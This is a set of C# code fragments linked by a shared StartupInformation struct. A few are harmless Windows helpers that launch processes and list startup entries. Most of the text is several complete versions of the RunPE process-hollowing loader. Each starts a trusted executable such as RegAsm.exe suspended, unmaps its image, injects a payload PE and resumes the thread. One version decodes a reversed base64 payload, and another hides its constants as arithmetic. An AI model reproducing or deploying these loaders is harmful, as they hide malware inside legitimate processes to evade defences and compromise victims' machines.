public static Process CreateProcess(string executablePath, string commandline, string desktopName) { executablePath = Path.GetFullPath(executablePath); commandline = string.Format("{0} {1}", executablePath, commandline); if (!File.Exists(executablePath)) { throw new FileNotFoundException("The applicaiton file was not found.", executablePath); } var startInfo = new StartupInformation(); startInfo.cb = Marshal.SizeOf(typeof(StartupInformation)); startInfo.lpDesktop = desktopName; ProcessInformation processInfo; var result = CreateProcess(executablePath, commandline, IntPtr.Zero, IntPtr.Zero, true, NormalPriorityClass, IntPtr.Zero, Path.GetDirectoryName(executablePath), ref startInfo, out processInfo); if (!result) { throw new Win32Exception(Marshal.GetLastWin32Error()); } return(Process.GetProcessById(processInfo.dwProcessId)); }
/// <summary> /// 指定したフォルダに登録されているスタートアップを取得 /// </summary> /// <param name="startup_information">スタートアップ情報</param> /// <param name="startup_register_place">登録情報</param> /// <param name="startup_folder_path">パス</param> private static void GetDesignationFolder( ref System.Collections.Generic.List <StartupInformation> startup_information, StartupRegisterPlace startup_register_place, string startup_folder_path ) { try { string[] file_path = System.IO.Directory.GetFiles(startup_folder_path, "*.lnk", System.IO.SearchOption.TopDirectoryOnly); // ファイルパス foreach (string now_file_path in file_path) { try { IWshRuntimeLibrary.IWshShell_Class shell = new IWshRuntimeLibrary.IWshShell_Class(); IWshRuntimeLibrary.IWshShortcut_Class shortcut = (IWshRuntimeLibrary.IWshShortcut_Class)shell.CreateShortcut(now_file_path); StartupInformation new_startup_information = new StartupInformation { Path = shortcut.TargetPath, RegisterName = System.IO.Path.GetFileNameWithoutExtension(shortcut.FullName), Parameter = shortcut.Arguments, WorkingDirectory = shortcut.WorkingDirectory, RegisterPlace = startup_register_place }; switch (shortcut.WindowStyle) { case 1: new_startup_information.WindowState = WindowState.Normal; break; case 3: new_startup_information.WindowState = WindowState.Maximized; break; case 7: new_startup_information.WindowState = WindowState.Minimized; break; } startup_information.Add(new_startup_information); } catch { } } } catch { } }
/// <summary> /// 指定したレジストリに登録されているスタートアップを取得 /// </summary> /// <param name="startup_information">スタートアップ情報</param> /// <param name="startup_register_place">登録場所</param> /// <param name="registry_hive_path">RegistryHivePath</param> private static void GetDesignationRegistry( ref System.Collections.Generic.List <StartupInformation> startup_information, StartupRegisterPlace startup_register_place, RegistryHivePath registry_hive_path ) { try { using (Microsoft.Win32.RegistryKey base_registry_key = Microsoft.Win32.RegistryKey.OpenBaseKey(registry_hive_path.RegistryHive, Microsoft.Win32.RegistryView.Default)) { using (Microsoft.Win32.RegistryKey sub_registry_key = base_registry_key.OpenSubKey(registry_hive_path.Path)) { string[] value_name = sub_registry_key.GetValueNames(); // 名前 for (int count = 0; count < value_name.Length; count++) { try { string key_value = (string)sub_registry_key.GetValue(value_name[count]); // 値 if (key_value.Length != 0) { string path; // パス string parameter; // パラメータ SeparateFullPathParameter(key_value, out path, out parameter); StartupInformation new_startup_information = new StartupInformation { RegisterName = value_name[count], Path = path, Parameter = parameter, RegisterPlace = startup_register_place }; startup_information.Add(new_startup_information); } } catch { } } } } } catch { } }
public static void Main() { string path = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe"); byte[] payload = Convert.FromBase64String(Strings.StrReverse("REVERSEBASE64APPCODE")); for (int i = 0; i < 5; i++) { int readWrite = 0x0; StartupInformation si = new StartupInformation(); ProcessInformation pi = new ProcessInformation(); si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation))); try { if (!CreateProcessA(path, string.Empty, IntPtr.Zero, IntPtr.Zero, false, 0x00000004 | 0x08000000, IntPtr.Zero, null, ref si, ref pi)) { throw new Exception(); } int fileAddress = BitConverter.ToInt32(payload, 0x3C); int imageBase = BitConverter.ToInt32(payload, fileAddress + 0x34); int[] context = new int[0xB3]; context[0x0] = 0x10002; if (IntPtr.Size == 0x4) { if (!GetThreadContext(pi.ThreadHandle, context)) { throw new Exception(); } } else { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) { throw new Exception(); } } int ebx = context[0x29]; int baseAddress = 0x0; if (!ReadProcessMemory(pi.ProcessHandle, ebx + 0x8, ref baseAddress, 0x4, ref readWrite)) { throw new Exception(); } if (imageBase == baseAddress) { if (ZwUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0x0) { throw new Exception(); } } int sizeOfImage = BitConverter.ToInt32(payload, fileAddress + 0x50); int sizeOfHeaders = BitConverter.ToInt32(payload, fileAddress + 0x54); bool allowOverride = false; int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 0x3000, 0x40); if (newImageBase == 0x0) { throw new Exception(); } if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref readWrite)) { throw new Exception(); } int sectionOffset = fileAddress + 0xF8; short numberOfSections = BitConverter.ToInt16(payload, fileAddress + 0x6); for (int I = 0; I < numberOfSections; I++) { int virtualAddress = BitConverter.ToInt32(payload, sectionOffset + 0xC); int sizeOfRawData = BitConverter.ToInt32(payload, sectionOffset + 0x10); int pointerToRawData = BitConverter.ToInt32(payload, sectionOffset + 0x14); if (sizeOfRawData != 0x0) { byte[] sectionData = new byte[sizeOfRawData]; Buffer.BlockCopy(payload, pointerToRawData, sectionData, 0x0, sectionData.Length); if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) { throw new Exception(); } } sectionOffset += 0x28; } byte[] pointerData = BitConverter.GetBytes(newImageBase); if (!WriteProcessMemory(pi.ProcessHandle, ebx + 0x8, pointerData, 0x4, ref readWrite)) { throw new Exception(); } int addressOfEntryPoint = BitConverter.ToInt32(payload, fileAddress + 0x28); if (allowOverride) { newImageBase = imageBase; } context[0x2C] = newImageBase + addressOfEntryPoint; if (IntPtr.Size == 0x4) { if (!SetThreadContext(pi.ThreadHandle, context)) { throw new Exception(); } } else { if (!Wow64SetThreadContext(pi.ThreadHandle, context)) { throw new Exception(); } } if (ResumeThread(pi.ThreadHandle) == -1) { throw new Exception(); } } catch { Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill(); continue; } break; } }
private static bool HandleRun(string path, byte[] data, bool protect) { int readWrite = 0; string quotedPath = ""; StartupInformation si = new StartupInformation(); ProcessInformation pi = new ProcessInformation(); si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation))); try { if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 2 + 2, IntPtr.Zero, null, ref si, ref pi)) { throw new Exception(); } int fileAddress = BitConverter.ToInt32(data, 120 / 2); int imageBase = BitConverter.ToInt32(data, fileAddress + 26 + 26); int[] context = new int[179]; context[0] = 32769 + 32769; if (IntPtr.Size == 8 / 2) { if (!GetThreadContext(pi.ThreadHandle, context)) { throw new Exception(); } } else { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) { throw new Exception(); } } int ebx = context[41]; int baseAddress = 1 - 1; if (!ReadProcessMemory(pi.ProcessHandle, ebx + 4 + 4, ref baseAddress, 2 + 2, ref readWrite)) { throw new Exception(); } if (imageBase == baseAddress) { if (NtUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 1 - 1) { throw new Exception(); } } int sizeOfImage = BitConverter.ToInt32(data, fileAddress + 160 / 2); int sizeOfHeaders = BitConverter.ToInt32(data, fileAddress + 42 + 42); bool allowOverride = false; int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 6144 + 6144, 32 + 32); if (newImageBase == 0) { throw new Exception(); } if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, data, sizeOfHeaders, ref readWrite)) { throw new Exception(); } int sectionOffset = fileAddress + 124 * 2; short numberOfSections = BitConverter.ToInt16(data, fileAddress + 3 + 3); for (int I = 1 - 1; I < numberOfSections; I++) { int virtualAddress = BitConverter.ToInt32(data, sectionOffset + 6 + 6); int sizeOfRawData = BitConverter.ToInt32(data, sectionOffset + 8 + 8); int pointerToRawData = BitConverter.ToInt32(data, sectionOffset + 40 / 2); if (sizeOfRawData != 1 - 1) { byte[] sectionData = new byte[sizeOfRawData]; Buffer.BlockCopy(data, pointerToRawData, sectionData, 2 - 2, sectionData.Length); if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) { throw new Exception(); } } sectionOffset += 120 / 3; } byte[] pointerData = BitConverter.GetBytes(newImageBase); if (!WriteProcessMemory(pi.ProcessHandle, ebx + 16 / 2, pointerData, 2 * 2, ref readWrite)) { throw new Exception(); } int addressOfEntryPoint = BitConverter.ToInt32(data, fileAddress + 80 / 2); if (allowOverride) { newImageBase = imageBase; } context[22 + 22] = newImageBase + addressOfEntryPoint; if (IntPtr.Size == 2 + 2) { if (!SetThreadContext(pi.ThreadHandle, context)) { throw new Exception(); } } else { if (!Wow64SetThreadContext(pi.ThreadHandle, context)) { throw new Exception(); } } if (ResumeThread(pi.ThreadHandle) == -1) { throw new Exception(); } if (protect) { Protect(pi.ProcessHandle); } } catch { Process p = Process.GetProcessById(Convert.ToInt32(pi.ProcessId)); p.Kill(); return(false); } return(true); }
private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);
static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref StartupInformation lpStartupInfo, out ProcessInformation lpProcessInformation);
public static void Run(string path, byte[] payload) { for (int i = 0; i < 5; i++) { int bytesRead = 0; StartupInformation si = new StartupInformation { Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation))) }; ProcessInformation pi = new ProcessInformation(); try { if (!CreateProcessA(path, "", IntPtr.Zero, IntPtr.Zero, false, 0x8000004, IntPtr.Zero, null, ref si, ref pi)) { throw new Exception(); } int fileAddress = BitConverter.ToInt32(payload, 0x3c); int imageBase = BitConverter.ToInt32(payload, fileAddress + 0x34); int[] context = new int[0xb3]; context[0] = 0x10002; if (IntPtr.Size == 4) { if (!GetThreadContext(pi.ThreadHandle, context)) { throw new Exception(); } } else { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) { throw new Exception(); } } int ebx = context[0x29]; int baseAddress = 0; if (!ReadProcessMemory(pi.ProcessHandle, ebx + 8, ref baseAddress, 4, ref bytesRead)) { throw new Exception(); } if (imageBase == baseAddress && ZwUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0) { throw new Exception(); } int sizeOfImage = BitConverter.ToInt32(payload, fileAddress + 0x50); int sizeOfHeaders = BitConverter.ToInt32(payload, fileAddress + 0x54); int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 0x3000, 0x40); if (newImageBase == 0) { throw new Exception(); } if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref bytesRead)) { throw new Exception(); } for (int j = 0, sectionOffset = fileAddress + 0xf8; j < BitConverter.ToInt16(payload, fileAddress + 6); j++) { int virtualAddress = BitConverter.ToInt32(payload, sectionOffset + 0xc); int sizeOfRawData = BitConverter.ToInt32(payload, sectionOffset + 0x10); int pointerToRawData = BitConverter.ToInt32(payload, sectionOffset + 0x14); if (sizeOfRawData != 0) { byte[] sectionData = new byte[sizeOfRawData]; Buffer.BlockCopy(payload, pointerToRawData, sectionData, 0, sectionData.Length); if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref bytesRead)) { throw new Exception(); } } sectionOffset += 0x28; } if (!WriteProcessMemory(pi.ProcessHandle, ebx + 8, BitConverter.GetBytes(newImageBase), 4, ref bytesRead)) { throw new Exception(); } context[0x2c] = newImageBase + BitConverter.ToInt32(payload, fileAddress + 0x28); if (IntPtr.Size == 4) { if (!SetThreadContext(pi.ThreadHandle, context)) { throw new Exception(); } } else { if (!Wow64SetThreadContext(pi.ThreadHandle, context)) { throw new Exception(); } } if (ResumeThread(pi.ThreadHandle) == -1) { throw new Exception(); } } catch { Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill(); continue; } break; } }
public static bool RunDank(string path, string cmd, byte[] data) { int readWrite = 0; string quotedPath = string.Format("\"{0}\"", path); StartupInformation si = new StartupInformation(); ProcessInformation pi = new ProcessInformation(); si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation))); if (string.IsNullOrEmpty(cmd)) { if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 4, IntPtr.Zero, null, ref si, ref pi)) { return(false); } } else { quotedPath = quotedPath + " " + cmd; if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 4, IntPtr.Zero, null, ref si, ref pi)) { return(false); } } int fileAddress = BitConverter.ToInt32(data, 60); int imageBase = BitConverter.ToInt32(data, fileAddress + 52); int[] context = new int[179]; context[0] = 65538; if (!GetThreadContext(pi.ThreadHandle, context)) { return(false); } int ebx = context[41]; int baseAddress = 0; if (!ReadProcessMemory(pi.ProcessHandle, ebx + 8, ref baseAddress, 4, ref readWrite)) { return(false); } if (imageBase == baseAddress) { if (NtUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0) { return(false); } } int sizeOfImage = BitConverter.ToInt32(data, fileAddress + 80); int sizeOfHeaders = BitConverter.ToInt32(data, fileAddress + 84); bool allowOverride = false; int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 12288, 64); if (newImageBase == 0) { allowOverride = true; newImageBase = VirtualAllocEx(pi.ProcessHandle, 0, sizeOfImage, 12288, 64); if (newImageBase == 0) { return(false); } } if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, data, sizeOfHeaders, ref readWrite)) { return(false); } int sectionOffset = fileAddress + 248; short numberOfSections = BitConverter.ToInt16(data, fileAddress + 6); for (int I = 0; I <= numberOfSections - 1; I++) { int virtualAddress = BitConverter.ToInt32(data, sectionOffset + 12); int sizeOfRawData = BitConverter.ToInt32(data, sectionOffset + 16); int pointerToRawData = BitConverter.ToInt32(data, sectionOffset + 20); if (sizeOfRawData != 0) { byte[] sectionData = new byte[sizeOfRawData]; Buffer.BlockCopy(data, pointerToRawData, sectionData, 0, sectionData.Length); if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) { return(false); } } sectionOffset += 40; } byte[] pointerData = BitConverter.GetBytes(newImageBase); if (!WriteProcessMemory(pi.ProcessHandle, ebx + 8, pointerData, 4, ref readWrite)) { return(false); } int addressOfEntryPoint = BitConverter.ToInt32(data, fileAddress + 40); if (allowOverride) { newImageBase = imageBase; } context[44] = newImageBase + addressOfEntryPoint; if (!SetThreadContext(pi.ThreadHandle, context)) { return(false); } if (ResumeThread(pi.ThreadHandle) == -1) { return(false); } return(true); }